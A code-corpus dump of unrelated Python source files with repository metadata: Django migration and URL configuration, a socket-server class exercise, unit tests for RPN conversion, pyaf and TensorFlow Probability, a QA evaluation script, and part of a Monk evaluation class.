3af5a71b8872d5cf2b9f43540b63446cfa70383b
|
refs/heads/master
| 2021-09-06T16:05:56.827815
| 2018-02-08T10:36:13
| 2018-02-08T10:36:13
| 117,220,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-21 18:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rango', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='category',
options={'verbose_name_plural': 'Categories'},
),
migrations.AddField(
model_name='category',
name='likes',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='category',
name='views',
field=models.IntegerField(default=0),
),
]
|
[
"2247164D@student.gla.ac.uk"
] |
2247164D@student.gla.ac.uk
|
af3775190e643c596ee52288df6168ac27e96704
|
16da574a10f7cb19200cc076400eb0af15ce0927
|
/soulware-backend/web_proj/urls.py
|
b34ac59c7e3163483c6697a76b3bc7123720e669
|
[] |
no_license
|
shg9411/soulware
|
f08128a91e84adb42169101a84ce2d41faed4e7e
|
4e0ce35dd3cbcda00138f7db49d6949e699da562
|
refs/heads/main
| 2023-04-28T04:54:05.957589
| 2021-05-10T06:05:53
| 2021-05-10T06:05:53
| 348,669,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,033
|
py
|
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
from rest_framework import permissions
schema_view = get_schema_view(
openapi.Info(
title="API",
default_version='v1',
description="API 문서",
contact=openapi.Contact(email="shg9411@naver.com"),
license=openapi.License(name="No License"),
),
public=True,
permission_classes=(permissions.AllowAny,),
)
urlpatterns = [
# path('admin/', admin.site.urls),
path('api/accounts/', include('accounts.urls')),
path('api/boards/', include('boards.urls')),
path('api/blogs/',include('blogs.urls'))
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
urlpatterns += [
path('', schema_view.with_ui('swagger',
cache_timeout=0), name='schema-swagger-ui'),
]
|
[
"shg9411@naver.com"
] |
shg9411@naver.com
|
8843f08796119d39abcfba1b77cf133fba75e43f
|
31ee95824818f899707f046c71d676bae0416a55
|
/class6-sockets/3c.betterserver.py
|
bf565ff7729a267c450909b07799ce466bf3e580
|
[] |
no_license
|
cloudsecuritylabs/pythonclassaug2021
|
25af51df61ca804656001821f945dcfa1cb23502
|
c1aa6a9b0b602b1be581c06c695a66ca3741d480
|
refs/heads/master
| 2023-08-24T13:19:08.350995
| 2021-10-11T02:50:24
| 2021-10-11T02:50:24
| 400,352,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 421
|
py
|
import socket
try:
mysocket = socket.socket()
mysocket.bind(('0.0.0.0', 1339))
mysocket.listen(1)
c, addr = mysocket.accept()
buffer = 5
data = ""
while True:
packet = c.recv(buffer)
parsed = packet.decode()
data += parsed
if len(packet) < buffer :
print(f'full data -> {data}')
break
except:
print("done")
|
[
"basu.ankan@gmail.com"
] |
basu.ankan@gmail.com
|
f7c5355d1cc1c692102fd43f2b4ead3cb9c6aa46
|
a48b6a7de1271d60106e2c372039867906ff209a
|
/finished/rpninfix_test.py
|
c11a6227ba91ec2861282c0b0039266079694fdb
|
[
"MIT"
] |
permissive
|
kpatel20538/Rosetta-Code-Python-Tasks
|
f96edc50ffd5cad1bdd1e7e1ae56cb801ca3fd2b
|
0e0a7af89fa0dd3a534c6edf83b99e3e8a41b19a
|
refs/heads/master
| 2021-01-12T00:08:02.022550
| 2017-01-16T02:13:20
| 2017-01-16T02:13:20
| 78,676,035
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 757
|
py
|
import tasks.rpninfix
import unittest
import logging
class TestRpnInfix(unittest.TestCase):
def setUp(self):
""" Test Case Enviroment """
logging.basicConfig(filename="./logs/rpninfix_test.log",level=logging.DEBUG)
logging.info('TestRpnInfix initialized')
def test_left_assoc(self):
""" Testing Left Associativity """
logging.info("test_left_assoc()")
rpn = "3 4 5 - *"
infix = tasks.rpninfix.rpn_to_infix(rpn)
self.assertEqual(infix,"3 * ( 4 - 5 )")
def test_right_assoc(self):
""" Testing Right Associativity """
logging.info("test_right_assoc()")
rpn = "5 6 ^ 7 ^"
infix = tasks.rpninfix.rpn_to_infix(rpn)
self.assertEqual(infix,"( 5 ^ 6 ) ^ 7")
if __name__ == '__main__':
unittest.main()
|
[
"kpatel20538@gmail.com"
] |
kpatel20538@gmail.com
|
5960b56a73a75ad709c224e1284238096c68a1a7
|
37cc94b8c79fda394068b938037085eb3198024a
|
/script.py
|
f272cbb625397da886760d98b0934385c6dd03de
|
[
"BSD-2-Clause"
] |
permissive
|
kingsea0-0/GrafNet
|
c98922d1f4239f259c8a1ac28ec955c5c539e825
|
32165bfccf5afb171c4b8362796f825e16392e30
|
refs/heads/master
| 2022-04-18T07:28:43.813180
| 2020-04-23T07:48:30
| 2020-04-23T07:48:30
| 256,982,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,673
|
py
|
import sys
import json
import nltk
from tqdm import tqdm
from collections import Counter
# from itertools import zip
def combine_dist(dist1, dist2, w1):
ensemble_dist = dist2.copy()
for gid, prob in dist1.items():
if gid in ensemble_dist:
ensemble_dist[gid] = (1 - w1) * ensemble_dist[gid] + w1 * prob
else:
ensemble_dist[gid] = prob
return ensemble_dist
def get_one_f1(entities, dist, eps, answers):
correct = 0.0
total = 0.0
best_entity = -1
max_prob = 0.0
preds = []
for entity in entities:
if dist[entity] > max_prob:
max_prob = dist[entity]
best_entity = entity
if dist[entity] > eps:
preds.append(entity)
return cal_eval_metric(best_entity, preds, answers)
def cal_eval_metric(best_pred, preds, answers):
correct, total = 0.0, 0.0
for entity in preds:
if entity in answers:
correct += 1
total += 1
if len(answers) == 0:
if total == 0:
return 1.0, 1.0, 1.0, 1.0 # precision, recall, f1, hits
else:
return 0.0, 1.0, 0.0, 1.0 # precision, recall, f1, hits
else:
hits = float(best_pred in answers)
if total == 0:
return 1.0, 0.0, 0.0, hits # precision, recall, f1, hits
else:
precision, recall = correct / total, correct / len(answers)
f1 = 2.0 / (1.0 / precision + 1.0 / recall) if precision != 0 and recall != 0 else 0.0
return precision, recall, f1, hits
def compare_pr(kb_pred_file, doc_pred_file, hybrid_pred_file, w_kb, eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all):
doc_only_recall, doc_only_precision, doc_only_f1, doc_only_hits = [], [], [], []
kb_only_recall, kb_only_precision, kb_only_f1, kb_only_hits = [], [], [], []
ensemble_recall, ensemble_precision, ensemble_f1, ensemble_hits = [], [], [], []
hybrid_recall, hybrid_precision, hybrid_f1, hybrid_hits = [], [], [], []
ensemble_all_recall, ensemble_all_precision, ensemble_all_f1, ensemble_all_hits = [], [], [], []
total_not_answerable = 0.0
with open(kb_pred_file, 'rb') as f_kb, open(doc_pred_file, 'rb') as f_doc, open(hybrid_pred_file, 'rb') as f_hybrid:
line_id = 0
for line_kb, line_doc, line_hybrid in tqdm(zip(f_kb, f_doc, f_hybrid)):
line_id += 1
line_kb = json.loads(line_kb)
line_doc = json.loads(line_doc)
line_hybrid = json.loads(line_hybrid)
assert line_kb['answers'] == line_doc['answers'] == line_hybrid['answers']
answers = set([unicode(answer) for answer in line_kb['answers']])
# total_not_answerable += (len(answers) == 0)
# assert len(answers) > 0
dist_kb = line_kb['dist']
dist_doc = line_doc['dist']
dist_hybrid = line_hybrid['dist']
dist_ensemble = combine_dist(dist_kb, dist_doc, w_kb)
dist_ensemble_all = combine_dist(dist_ensemble, dist_hybrid, w1=0.3)
kb_entities = set(dist_kb.keys())
doc_entities = set(dist_doc.keys())
either_entities = kb_entities | doc_entities
assert either_entities == set(dist_hybrid.keys())
p, r, f1, hits = get_one_f1(doc_entities, dist_doc, eps_doc, answers)
doc_only_precision.append(p)
doc_only_recall.append(r)
doc_only_f1.append(f1)
doc_only_hits.append(hits)
p, r, f1, hits = get_one_f1(kb_entities, dist_kb, eps_kb, answers)
kb_only_precision.append(p)
kb_only_recall.append(r)
kb_only_f1.append(f1)
kb_only_hits.append(hits)
p, r, f1, hits = get_one_f1(either_entities, dist_ensemble, eps_ensemble, answers)
ensemble_precision.append(p)
ensemble_recall.append(r)
ensemble_f1.append(f1)
ensemble_hits.append(hits)
p, r, f1, hits = get_one_f1(either_entities, dist_hybrid, eps_hybrid, answers)
hybrid_precision.append(p)
hybrid_recall.append(r)
hybrid_f1.append(f1)
hybrid_hits.append(hits)
p, r, f1, hits = get_one_f1(either_entities, dist_ensemble_all, eps_ensemble_all, answers)
ensemble_all_precision.append(p)
ensemble_all_recall.append(r)
ensemble_all_f1.append(f1)
ensemble_all_hits.append(hits)
print('text only setting:')
print('hits: ', sum(doc_only_hits) / len(doc_only_hits))
print('precision: ', sum(doc_only_precision) / len(doc_only_precision))
print('recall: ', sum(doc_only_recall) / len(doc_only_recall))
print('f1: ', sum(doc_only_f1) / len(doc_only_f1))
print('\n')
print('kb only setting:')
print('hits: ', sum(kb_only_hits) / len(kb_only_hits))
print('precision: ', sum(kb_only_precision) / len(kb_only_precision))
print('recall: ', sum(kb_only_recall) / len(kb_only_recall))
print('f1: ', sum(kb_only_f1) / len(kb_only_f1))
print('\n')
print('late fusion:')
print('hits: ', sum(ensemble_hits) / len(ensemble_hits))
print('precision: ', sum(ensemble_precision) / len(ensemble_precision))
print('recall: ', sum(ensemble_recall) / len(ensemble_recall))
print('f1: ', sum(ensemble_f1) / len(ensemble_f1))
print('\n')
print('early fusion:')
print('hits: ', sum(hybrid_hits) / len(hybrid_hits))
print('precision: ', sum(hybrid_precision) / len(hybrid_precision))
print('recall: ', sum(hybrid_recall) / len(hybrid_recall))
print('f1: ', sum(hybrid_f1) / len(hybrid_f1))
print('\n')
print('early & late fusion:')
print('hits: ', sum(ensemble_all_hits) / len(ensemble_all_hits))
print('precision: ', sum(ensemble_all_precision) / len(ensemble_all_precision))
print('recall: ', sum(ensemble_all_recall) / len(ensemble_all_recall))
print('f1: ', sum(ensemble_all_f1) / len(ensemble_all_f1))
print('\n')
if __name__ == "__main__":
dataset = sys.argv[1]
pred_kb_file = sys.argv[2]
pred_doc_file = sys.argv[3]
pred_hybrid_file = sys.argv[4]
if dataset == "wikimovie":
w_kb = 0.9
eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all = 0.5, 0.55, 0.6, 0.5, 0.55
elif dataset == "webqsp":
w_kb = 1.0
eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all = 0.15, 0.2, 0.2, 0.2, 0.3
else:
assert False, "dataset not recognized"
compare_pr(pred_kb_file, pred_doc_file, pred_hybrid_file, w_kb, eps_doc, eps_kb, eps_ensemble, eps_hybrid, eps_ensemble_all)
|
[
"741222996@qq.com"
] |
741222996@qq.com
|
dca56aedfa3ad1aebbac730c6682f2dfc35d9fb1
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_Integration/trend_PolyTrend/cycle_12/ar_/test_artificial_128_Integration_PolyTrend_12__100.py
|
b4f25714f1ffe6ea1d2ffda7b332a68fb1668f32
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219
| 2023-07-28T20:15:53
| 2023-07-28T20:15:53
| 70,790,978
| 457
| 77
|
BSD-3-Clause
| 2023-03-08T21:45:40
| 2016-10-13T09:30:30
|
Python
|
UTF-8
|
Python
| false
| false
| 268
|
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 12, transform = "Integration", sigma = 0.0, exog_count = 100, ar_order = 0);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
60420a475a2f7366d5990acf32aebbc4b9c41da5
|
ba6924d75c47ec173749a7fe2fd54a195f542dc3
|
/tensorflow_probability/python/distributions/joint_distribution_coroutine_test.py
|
87175609d56f614fe9ae2689f49eb4993f6bccf1
|
[
"Apache-2.0"
] |
permissive
|
AngelBerihuete/probability
|
d8e27f7a78fb558f22ca8115ba042d49f335415b
|
8bdbf1c0b0f801edaf342f4ffc9caf1cfd6f1103
|
refs/heads/master
| 2020-06-09T13:52:01.275044
| 2019-06-22T00:06:10
| 2019-06-22T00:07:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,970
|
py
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the JointDistributionCoroutine."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Dependency imports
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import
tfd = tfp.distributions
Root = tfd.JointDistributionCoroutine.Root
@test_util.run_all_in_graph_and_eager_modes
class JointDistributionCoroutineTest(tf.test.TestCase):
def test_batch_and_event_shape_no_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
# Neither `event_shape` nor `batch_shape` can be determined
# without the underlying distributions being cached.
self.assertAllEqual(joint.event_shape, None)
self.assertAllEqual(joint.batch_shape, None)
ds, _ = joint.sample_distributions()
self.assertLen(ds, 3)
self.assertIsInstance(ds[0], tfd.Bernoulli)
self.assertIsInstance(ds[1], tfd.Bernoulli)
self.assertIsInstance(ds[2], tfd.Normal)
is_event_scalar = joint.is_scalar_event()
self.assertAllEqual(is_event_scalar[0], True)
self.assertAllEqual(is_event_scalar[1], True)
self.assertAllEqual(is_event_scalar[2], True)
event_shape = joint.event_shape_tensor()
self.assertAllEqual(event_shape[0], [])
self.assertAllEqual(event_shape[1], [])
self.assertAllEqual(event_shape[2], [])
self.assertAllEqual(joint.event_shape, [[], [], []])
is_batch_scalar = joint.is_scalar_batch()
self.assertAllEqual(is_batch_scalar[0], True)
self.assertAllEqual(is_batch_scalar[1], True)
self.assertAllEqual(is_batch_scalar[2], True)
batch_shape = joint.batch_shape_tensor()
self.assertAllEqual(batch_shape[0], [])
self.assertAllEqual(batch_shape[1], [])
self.assertAllEqual(batch_shape[2], [])
self.assertAllEqual(joint.batch_shape, [[], [], []])
def test_batch_and_event_shape_with_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (g)--+-->--(loc) |
# | | |
# | v |
# (df)--+-->---(x) |
# +--------20-+
def dist():
g = yield Root(tfd.Gamma(2, 2))
df = yield Root(tfd.Exponential(1.))
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.Independent(tfd.StudentT(tf.expand_dims(df, -1), loc, 1), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
# Neither `event_shape` nor `batch_shape` can be determined
# without the underlying distributions being cached.
self.assertAllEqual(joint.event_shape, None)
self.assertAllEqual(joint.batch_shape, None)
ds, _ = joint.sample_distributions()
self.assertLen(ds, 4)
self.assertIsInstance(ds[0], tfd.Gamma)
self.assertIsInstance(ds[1], tfd.Exponential)
self.assertIsInstance(ds[2], tfd.Sample)
self.assertIsInstance(ds[3], tfd.Independent)
is_scalar = joint.is_scalar_event()
self.assertAllEqual(is_scalar[0], True)
self.assertAllEqual(is_scalar[1], True)
self.assertAllEqual(is_scalar[2], False)
self.assertAllEqual(is_scalar[3], False)
event_shape = joint.event_shape_tensor()
self.assertAllEqual(event_shape[0], [])
self.assertAllEqual(event_shape[1], [])
self.assertAllEqual(event_shape[2], [20])
self.assertAllEqual(event_shape[3], [20])
self.assertAllEqual(joint.event_shape, [[], [], [20], [20]])
is_batch = joint.is_scalar_batch()
self.assertAllEqual(is_batch[0], True)
self.assertAllEqual(is_batch[1], True)
self.assertAllEqual(is_batch[2], True)
self.assertAllEqual(is_batch[3], True)
batch_shape = joint.batch_shape_tensor()
self.assertAllEqual(batch_shape[0], [])
self.assertAllEqual(batch_shape[1], [])
self.assertAllEqual(batch_shape[2], [])
self.assertAllEqual(batch_shape[3], [])
self.assertAllEqual(joint.batch_shape, [[], [], [], []])
def test_sample_shape_no_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
self.assertAllEqual(tf.shape(input=z[0]), [])
self.assertAllEqual(tf.shape(input=z[1]), [])
self.assertAllEqual(tf.shape(input=z[2]), [])
z = joint.sample(2)
self.assertAllEqual(tf.shape(input=z[0]), [2])
self.assertAllEqual(tf.shape(input=z[1]), [2])
self.assertAllEqual(tf.shape(input=z[2]), [2])
z = joint.sample([3, 2])
self.assertAllEqual(tf.shape(input=z[0]), [3, 2])
self.assertAllEqual(tf.shape(input=z[1]), [3, 2])
self.assertAllEqual(tf.shape(input=z[2]), [3, 2])
def test_sample_shape_with_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (g)--+-->--(loc) |
# | | |
# | v |
# (df)--+-->---(x) |
# +--------20-+
def dist():
g = yield Root(tfd.Gamma(2, 2))
df = yield Root(tfd.Exponential(1.))
loc = yield tfd.Sample(tfd.Normal(0, g), 20)
yield tfd.Independent(tfd.StudentT(tf.expand_dims(df, -1), loc, 1), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
self.assertAllEqual(tf.shape(input=z[0]), [])
self.assertAllEqual(tf.shape(input=z[1]), [])
self.assertAllEqual(tf.shape(input=z[2]), [20])
self.assertAllEqual(tf.shape(input=z[3]), [20])
z = joint.sample(2)
self.assertAllEqual(tf.shape(input=z[0]), [2])
self.assertAllEqual(tf.shape(input=z[1]), [2])
self.assertAllEqual(tf.shape(input=z[2]), [2, 20])
self.assertAllEqual(tf.shape(input=z[3]), [2, 20])
z = joint.sample([3, 2])
self.assertAllEqual(tf.shape(input=z[0]), [3, 2])
self.assertAllEqual(tf.shape(input=z[1]), [3, 2])
self.assertAllEqual(tf.shape(input=z[2]), [3, 2, 20])
self.assertAllEqual(tf.shape(input=z[3]), [3, 2, 20])
def test_log_prob_no_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
log_prob = joint.log_prob(z)
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_log_prob_with_plate(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# | |
# (a)--+--(b)->(c) |
# | |
# +---------2-+
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Sample(tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32), 2)
yield tfd.Independent(tfd.Normal(loc=a, scale=1. + b), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
log_prob = joint.log_prob(z)
expected_log_prob = (
np.log(0.5) +
tf.reduce_sum(input_tensor=tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a))) +
tf.reduce_sum(input_tensor=-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b))))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_log_prob_multiple_samples(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample(4)
log_prob = joint.log_prob(z)
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_prob_multiple_samples(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# (a)-->--(b)
# \ |
# \ v
# `->-(c)
def dist():
a = yield Root(tfd.Bernoulli(probs=0.5,
dtype=tf.float32))
b = yield tfd.Bernoulli(probs=0.25 + 0.5*a,
dtype=tf.float32)
yield tfd.Normal(loc=a, scale=1. + b)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample(4)
prob = joint.prob(z)
a, b, c = z # pylint: disable=unbalanced-tuple-unpacking
expected_prob = tf.exp(
np.log(0.5) +
tf.math.log(b * (0.25 + 0.5 * a) +
(1 - b) * (0.75 -0.5 * a)) +
-0.5 * ((c - a) / (1. + b)) ** 2 -
0.5 * np.log(2. * np.pi) -
tf.math.log((1. + b)))
self.assertAllClose(*self.evaluate([prob, expected_prob]))
def test_log_prob_multiple_roots(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (a)--+-->---(b) |
# | | |
# | v |
# (c)--+-->---(d) |
# +---------2-+
def dist():
a = yield Root(tfd.Exponential(1.))
b = yield tfd.Sample(tfd.Normal(a, 1.), 20)
c = yield Root(tfd.Exponential(1.))
yield tfd.Independent(tfd.Normal(b, tf.expand_dims(c, -1)), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample()
a, b, c, d = z # pylint: disable=unbalanced-tuple-unpacking
expected_log_prob = (- a +
tf.reduce_sum(
input_tensor=
-0.5 * (b - a) ** 2 +
-0.5 * np.log(2. * np.pi),
axis=-1) -
c +
tf.reduce_sum(
input_tensor=
-0.5 * (d - b) ** 2 / c ** 2 +
-0.5 * tf.math.log(2. * np.pi * c ** 2),
axis=-1))
log_prob = joint.log_prob(z)
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_log_prob_multiple_roots_and_samples(self):
# The joint distribution specified below corresponds to this
# graphical model
#
# +-----------+
# (a)--+-->---(b) |
# | | |
# | v |
# (c)--+-->---(d) |
# +---------2-+
def dist():
a = yield Root(tfd.Exponential(1.))
b = yield tfd.Sample(tfd.Normal(a, 1.), 20)
c = yield Root(tfd.Exponential(1.))
yield tfd.Independent(tfd.Normal(b, tf.expand_dims(c, -1)), 1)
joint = tfd.JointDistributionCoroutine(dist, validate_args=True)
z = joint.sample([3, 5])
a, b, c, d = z # pylint: disable=unbalanced-tuple-unpacking
expanded_c = tf.expand_dims(c, -1)
expected_log_prob = (
- a +
tf.reduce_sum(
input_tensor=
-0.5 * (b - tf.expand_dims(a, -1)) ** 2 +
-0.5 * np.log(2. * np.pi),
axis=-1) -
c +
tf.reduce_sum(
input_tensor=
-0.5 * (d - b) ** 2 / expanded_c ** 2 +
-0.5 * tf.math.log(2. * np.pi * expanded_c ** 2),
axis=-1))
log_prob = joint.log_prob(z)
self.assertAllClose(*self.evaluate([log_prob, expected_log_prob]))
def test_sample_dtype_structures_output(self):
def noncentered_horseshoe_prior(num_features):
scale_variance = yield Root(
tfd.InverseGamma(0.5, 0.5))
scale_noncentered = yield Root(
tfd.Sample(tfd.HalfNormal(1.), num_features))
scale = scale_noncentered * scale_variance[..., None]**0.5
weights_noncentered = yield Root(
tfd.Sample(tfd.Normal(0., 1.), num_features))
yield tfd.Independent(tfd.Deterministic(weights_noncentered * scale),
reinterpreted_batch_ndims=1)
# Currently sample_dtype is only used for `tf.nest.pack_structure_as`. In
# the future we may use it for error checking and/or casting.
sample_dtype = collections.namedtuple('Model', [
'scale_variance',
'scale_noncentered',
'weights_noncentered',
'weights',
])(*([None]*4))
joint = tfd.JointDistributionCoroutine(
lambda: noncentered_horseshoe_prior(4),
sample_dtype=sample_dtype,
validate_args=True)
self.assertAllEqual(sorted(sample_dtype._fields),
sorted(joint.sample()._fields))
ds, xs = joint.sample_distributions([2, 3])
tf.nest.assert_same_structure(sample_dtype, ds)
tf.nest.assert_same_structure(sample_dtype, xs)
self.assertEqual([3, 4], joint.log_prob(joint.sample([3, 4])).shape)
def test_repr_with_custom_sample_dtype(self):
def model():
s = yield tfd.JointDistributionCoroutine.Root(
tfd.Sample(tfd.InverseGamma(2, 2), 100))
yield tfd.Independent(tfd.Normal(0, s), 1)
sd = collections.namedtuple('Model', ['s', 'w'])(None, None)
m = tfd.JointDistributionCoroutine(model, sample_dtype=sd)
self.assertEqual(
('tfp.distributions.JointDistributionCoroutine('
'"JointDistributionCoroutine",'
' dtype=Model(s=?, w=?))'),
str(m))
self.assertEqual(
('<tfp.distributions.JointDistributionCoroutine'
' \'JointDistributionCoroutine\''
' batch_shape=?'
' event_shape=?'
' dtype=Model(s=?, w=?)>'),
repr(m))
m.sample()
self.assertEqual(
('tfp.distributions.JointDistributionCoroutine('
'"JointDistributionCoroutine",'
' batch_shape=Model(s=[], w=[]),'
' event_shape=Model(s=[100], w=[100]),'
' dtype=Model(s=float32, w=float32))'),
str(m))
self.assertEqual(
('<tfp.distributions.JointDistributionCoroutine'
' \'JointDistributionCoroutine\''
' batch_shape=Model(s=[], w=[])'
' event_shape=Model(s=[100], w=[100])'
' dtype=Model(s=float32, w=float32)>'),
repr(m))
if __name__ == '__main__':
tf.test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
4262ca17e4f906cb8056db58604ac8cce6e59b9a
|
23ba854b3b6cb457c8c01793e24f15d411650281
|
/monk/tf_keras_1/finetune/level_4_evaluation_base.py
|
34b6beb1c1d5cd6ff1fdf4aa1d96d4abf7912acf
|
[
"Apache-2.0"
] |
permissive
|
shaunstanislauslau/monk_v1
|
a506a8cb2e45f3d04734bfab01db09eb3d804771
|
01905b911f1757adef9d7366a704b2a5289e1095
|
refs/heads/master
| 2023-05-11T08:16:39.442925
| 2020-03-03T07:45:06
| 2020-03-03T07:45:06
| 244,685,539
| 0
| 0
|
Apache-2.0
| 2023-05-09T19:02:15
| 2020-03-03T16:25:46
| null |
UTF-8
|
Python
| false
| false
| 6,543
|
py
|
from tf_keras_1.finetune.imports import *
from system.imports import *
from tf_keras_1.finetune.level_3_training_base import finetune_training
class finetune_evaluation(finetune_training):
@accepts("self", verbose=int, post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def __init__(self, verbose=1):
super().__init__(verbose=verbose);
###############################################################################################################################################
@accepts("self", post_trace=True)
@TraceFunction(trace_args=True, trace_rv=True)
def set_evaluation_final(self):
self.custom_print("Testing");
self.system_dict["testing"]["status"] = False;
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
verbose=1;
else:
verbose=0;
running_corrects = 0
class_dict = {};
class_names = list(self.system_dict["dataset"]["params"]["classes"].keys());
for i in range(len(class_names)):
class_dict[class_names[i]] = {};
class_dict[class_names[i]]["num_images"] = 0;
class_dict[class_names[i]]["num_correct"] = 0;
step_size_test=self.system_dict["local"]["data_loaders"]["test"].n//self.system_dict["local"]["data_loaders"]["test"].batch_size
output = self.system_dict["local"]["model"].predict_generator(generator=self.system_dict["local"]["data_loaders"]["test"],
steps=step_size_test,
callbacks=None,
max_queue_size=10,
workers=psutil.cpu_count(),
use_multiprocessing=False,
verbose=verbose);
i = 0;
labels = self.system_dict["local"]["data_loaders"]["test"].labels;
for i in range(len(labels)):
gt = class_names[labels[i]];
l = class_names[np.argmax(output[i])];
class_dict[gt]["num_images"] += 1;
if(l==gt):
running_corrects += 1;
class_dict[gt]["num_correct"] += 1;
accuracy = running_corrects / len(self.system_dict["local"]["data_loaders"]['test'].labels);
self.custom_print("");
self.custom_print(" Result");
self.custom_print(" class based accuracies");
for i in range(len(class_names)):
self.custom_print(" {}. {} - {} %".format(i, class_names[i],
class_dict[class_names[i]]["num_correct"]/class_dict[class_names[i]]["num_images"]*100));
class_dict[class_names[i]]["accuracy(%)"] = class_dict[class_names[i]]["num_correct"]/class_dict[class_names[i]]["num_images"]*100;
